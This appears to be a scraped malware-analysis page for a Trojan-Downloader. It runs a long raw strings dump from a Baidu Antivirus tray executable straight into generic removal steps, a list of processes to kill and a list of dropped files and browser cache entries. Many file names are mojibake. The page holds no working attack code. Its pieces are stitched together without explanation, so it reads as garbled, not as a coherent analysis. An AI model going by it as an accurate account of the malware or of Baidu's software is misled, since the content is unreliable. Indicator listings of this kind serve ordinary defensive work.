CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
unsupported version
&#xX;
%s='%s'
%s="%s"
standalone="%s"
encoding="%s"
version="%s"
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
.\filedispatch\FileDispatch.pb.cc
c:\clientci\workspace\bdm_v2.1_fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
config_service.proto
.\BDMConfig\Protocol\config_service.pb.cc
config_service.proto"(
cmd_list
.ConfigItem"@
.ResultSet
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
c:\clientci\workspace\bdm_v2.1_fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
GetProcessHeap
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
WaitNamedPipeW
SetNamedPipeHandleState
CreateNamedPipeW
ConnectNamedPipe
CreateIoCompletionPort
KERNEL32.dll
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegQueryInfoKeyW
RegSetKeySecurity
RegEnumKeyExW
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegDeleteKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
NETAPI32.dll
imagehlp.dll
BaiduAnTray.exe
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVCBDMConfigReportRecord@@
.?AVCPluginMenuItemExecutor@@
.?AVIPluginCmdExecutor@@
.?AVCBDMLauchReportRecord@@
.?AUPluginInfoPassiveSaver@@
.?AVPipeServer@IPC@@
.?AVCIpcPipeServer@IPC@@
.PA_W
.?AVWorkerThread@PipeServer@IPC@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
#include "windows.h"
ÿF=
2,2S2
= =%=.=8=
7-8}8f9
3$4(4,40444
6!6;6_6|6
7!7;7_7|7
8!8;8_8|8
9!9;9_9|9
:!:;:_:|:
=!=;=_=|=
5%5S5a5
>.?@?]?~?
1,2:2\2}2
5%5s5z5
5,5I5l6t6
:";(;.;4;
9”9s9
>/>6>^>~>
1(2,2024282
2 2,23292~2
4%4S4]4q4
0%0S0
:":?:`:~:
4!4-424I4e4q4}4
1!131@1|1
< <$<(<,<0<
2024282
= =$=(=,=0=4=
: :$:(:,:0:
2,3034383<3@3
4 4$4(4,4044484
: :$:(:,:0:4:8:
3 3$3(3,303
3 3(303<3`3
9,989@9\9
9 9$9(9,9094989<9@9
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
\updateTips.dat
download.db
publish.db
profile.db
Baiduan.exe -stmd=2 -selplugin={BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
{AF849809-EC94-47CB-80E9-1452BEC92ADA}
BDMNet.dll
{1CB69707-E42B-4128-8A00-7336B93DC262}
baiduan.exe -stmd=6
ActivateMainApp_{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\
{E9C9ED70-127F-4BE4-9821-74160A768A90}
{7576896A-4E2F-4665-AB7D-95938D2632F1}
{F5E93978-539C-476B-9A7B-B6C32025A557}
{716CE9AE-35B9-4639-B585-47F6B47B4E2D}
{D8CD8DC5-D053-402a-99D9-47554C744B0C}
BDMgr.exe -stmd=7
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
http://weishi.baidu.com/feedback/
TrayPluginContainerConfig.xml
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
QQ.exe
screen_snapshot.exe
SnippingTool.exe
BaiduAnUpdate.exe
BDMUpdate.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
1800000
ic_question_48_48.png
file='skin_image1.png' xtiled='true' ytiled='true'
BDASoftmgr.exe
BDASWAcc.exe
BaiduAnBugRpt.exe
BDMgr.exe -stmd=61 -prel
BaiduAn.exe
BaiduAnSvc.exe
Shell32.dll
FreeDistractionTips.xml
BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
ic_title_logo.png
btn_exit_hover_16_16.png
btn_opennodisturb_hover_16_16.png
btn_nodisturb_hover_16_16.png
btn_acc_hover_16_16.png
ico_mainpage_normal.png
btn_exit_normal_16_16.png
btn_acc_normal_16_16.png
btn_opennodisturb_normal_16_16.png
btn_nodisturb_normal_16_16.png
TrayMenu.xml
Config\config.ini
%d-%d-%d
ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}
2.1.0.1214
http://weishi.baidu.com
http://weishi.baidu.com/privacy.html
about.xml
@advapi32.dll
D:\BDdownloads
CommonRes.rdb
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
A\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
\kernel32.dll
Windows 8
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
Kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
\Global.db
xxxxxxxxxxxxxxxx
iphlpapi.dll
B\\.\PhysicalDrive%d
\\.\Scsi%d:
BWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{X-X-X-XX-XXXXXX}
\\.\pipe\{0F98C369-2D5B-4445-8D05-42E727DEA4D5}
PipeClient connect error
##cmd:
CPackCache.xml
BDMDownload.dll
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
CUninstalledPlugins.xml
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}
/{0}/{1}/{2}
SendIpcMessage Begin, MSGID:{0}, TARGET:{1}
SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
PostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
ForwardMessage - Forward Message, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
ForwardMessage - Forward Message Failed, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
/%d/%d/%d
ICreateNamedPipe
PipeServer::Run() - ConnectNamedPipe:
PipeServer::CreateListeningPipe Start Listen
PipeServer::Run() - GetOverlappedResult:
PipeServer::Run() - WaitForMultipleObjects:
PipeServer::Run() - Exception:
PipeServer::Run() - Unexpected exception
PipeServer::ReleaseTunnel()
PipeServer::WorkerThread::WriteCompleted - Tunnel write where not all data was written
PipeServer::Tunnel::Tunnel()
PipeServer::WorkerThread::Run() - Exception:
PipeServer::WorkerThread::Run() - Unexpected exception
PipeServer::WorkerThread::Run() - Unexpected operation
PipeServer::WorkerThread::Run() - Unexpected - pBuffer is 0
I0 is an invalid value for completionKey
CCIOCompletionPort::CIOCompletionPort() - CreateIoCompletionPort
CIOCompletionPort::AssociateDevice() - CreateIoCompletionPort
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
CIOCompletionPort::GetStatus() - GetQueuedCompletionStatus
d-d-d
HD823ABCA-A92F-429d-9E11-3779B5F682AA
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
BaiduanTray.exe

services.exe_756_rwx_00960000_00001000:




%Program Files%\Baidu\BaiduAn\2.1.18.21\bd0001.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    pczh_107_306.exe:232
    sc.exe:2108
    sc.exe:2092
    taskkill.exe:1896
    -8670_360_MM.exe:1148
    vcredist_x86.exe:1940
    MsiExec.exe:3856
    tha.exe:3316
    cacls.exe:1712
    

    2. 

  2. Delete the original Trojan-Downloader file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:
    

    %Program Files%\kele\tjjrfx_70745.exe (63950 bytes)
    %Program Files%\kele\uboskin\html\logo.gif (9 bytes)
    %Program Files%\kele\uboskin\skin\dibulan.jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\System.dll (11 bytes)
    %Program Files%\kele\uboskin\skin\hp.jpg (368 bytes)
    %Program Files%\kele\uboskin\skin\Close.jpg (848 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\open (947 bytes)
    %Documents and Settings%\%current user%\Desktop\Ëѹ·µ¼º½.lnk (1 bytes)
    %Program Files%\kele\uboskin\skin\logo.jpg (784 bytes)
    %Program Files%\kele\uboskin\config.ini (290 bytes)
    %Program Files%\kele\-8670_360_MM.exe (33295 bytes)
    %Program Files%\kele\uboskin\app\loading.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\NSISdl.dll (14 bytes)
    %Program Files%\kele\uboskin\skin\tv.jpg (784 bytes)
    %Program Files%\kele\uboskin\skin\max-2.jpg (319 bytes)
    %Program Files%\kele\uboskin\html\loading.swf (2 bytes)
    %Program Files%\kele\sg1.ico (9 bytes)
    %Program Files%\kele\uboskin\html\loading.html (679 bytes)
    %Program Files%\kele\ubohe.db (482 bytes)
    %Program Files%\kele\tj.txt (3 bytes)
    %Program Files%\kele\uboskin\skin\bf.jpg (4 bytes)
    %Program Files%\kele\uboskin\icon.ico (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (126061 bytes)
    %Program Files%\kele\uboskin\skin\pk.jpg (5 bytes)
    %Program Files%\kele\uboskin\skin\menu.jpg (1 bytes)
    %Program Files%\kele\pczh_107_306.exe (15168 bytes)
    %Program Files%\kele\uboskin\skin\list.jpg (670 bytes)
    %Program Files%\kele\uboskin\app\loading.swf (2 bytes)
    %Program Files%\kele\uboskin\skin\zb.jpg (4 bytes)
    %Program Files%\kele\yunboplayer.exe (6360 bytes)
    %Program Files%\kele\uboskin\skin\logo.tif (11344 bytes)
    %Program Files%\kele\uboskin\uboplaylist.xml (679 bytes)
    %Program Files%\kele\Ëѹ·µ¼º½.url (237 bytes)
    %Program Files%\kele\uboskin\skin\biaotilan.jpg (1 bytes)
    %Program Files%\kele\uboskin\skin\lt.jpg (885 bytes)
    %Program Files%\kele\uboskin\html\gbook.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\goodpic_dae_619.exe (266213 bytes)
    %Program Files%\kele\link.txt (349 bytes)
    %Program Files%\kele\uboskin\skin\max-1.jpg (372 bytes)
    %Program Files%\kele\uboskin\skin\bj.jpg (1552 bytes)
    %Program Files%\kele\ie.ico (784 bytes)
    %Documents and Settings%\%current user%\Desktop\2345µ¼º½.lnk (1 bytes)
    %Program Files%\kele\2345µ¼º½.url (232 bytes)
    %Program Files%\kele\uboskin\skin\min.jpg (242 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.4.0\°®Çé.ÖÇ»Û.4.0.lnk (720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsC.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nstA.tmp (20366 bytes)
    %Program Files%\ainqngz4.0\Ainqngz4.0.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\tj.html (91 bytes)
    %Program Files%\ainqngz4.0\Dcsvr.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\tj[2].htm (91 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\md5dll.dll (8 bytes)
    %Documents and Settings%\%current user%\Desktop\°®Çé.ÖÇ»Û.4.0.lnk (708 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Math.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.4.0\жÔØ.lnk (715 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsD.tmp (6 bytes)
    %Program Files%\ainqngz4.0\fdcard.exe (5520 bytes)
    %Documents and Settings%\%current user%\Templates\1320146202834744\YYM_955WD30.gif (994 bytes)
    %Program Files%\ainqngz4.0\uninstall.exe (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\Base64.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[4].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000KXFAo9s7mobL64F3f[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[3].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync_pos[1].htm (2 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\www.mnh.quzhao[1].xml (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAXO32N7 (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000AV1EJPWogCd7YFH9s[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[1].js (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000cuQgQTB3g3OFkZR_0[1].swf (7534 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000vLC1Ofnh0LFprLSs[1].swf (2705 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@q428[1].txt (4762 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\adx[2].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\sync[1].htm (899 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\s[1].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=6781&tlm=1398686606&tcn=1402680641&tpr=1402680635228&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\3&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=47&tlm=1398686606&tcn=1402680601&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[3].htm (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAI1GF6H.htm (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\css_mini[1].css (4 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1495 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAIB41UV.htm (1203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\cpro_media_small[1].png (645 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\sync[1].htm (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f0000I414Fs9Ex6MNwGg6[1].swf (825 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000DYlKNGeiuam3jyYls[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (368 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (7936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000AY4GuJTGCsxgDBTe0[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=1468&tlm=1398686606&tcn=1402680569&tpr=1402680568181&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAKXQFSH.swf (9115 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000KLx1mYZLI-ed9V_os[1].jpg (4435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000Z60Ab17JZtxZIQVnf[1].swf (1321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\sync[1].html (1215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mini_mnh_428[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAET0FSV.htm (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000c60Ma_q1Fr10rMvif[1].gif (4557 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CA6Z21AJ.swf (3931 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAIZWDOT.htm (2072 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2031&tlm=1398686606&tcn=1402680603&tpr=1402680601119&dpt=none&coa=&baidu_ (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CAPHGR31.htm (2089 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CAC5Y51U.htm (435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\adx[2].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\0f000Z60AW17JZtxZIQVsf[1].png (4801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini_mnh_428[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\CACD6BGD.swf (3715 bytes)
    %Documents and Settings%\%current user%\UserData\4XCFALMJ\www.mnh.quzhao[1].xml (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f0002dsZcSR_Ik2MbXxf0[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[1].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\0f000FtVHObQA_TQpKpGts[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\id=PWRkPj6&gp=10&time=nHcdPHDsnHD4nf[1].png (819 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000Qb3PMHRPyvfvvYfG6[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000DEUfQYMcAovJj_RMf[1].swf (8375 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[3].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\wh[1].js (6519 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f000ZfQTmWMFwX7fiSJP0[1].swf (777 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\0f000KQDyCuvJFLfvix_cf[1].png (3733 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\adx[2].gif (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\sync[2].htm (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\0f0000nHWK3REpexd7u1q6[1].swf (825 bytes)
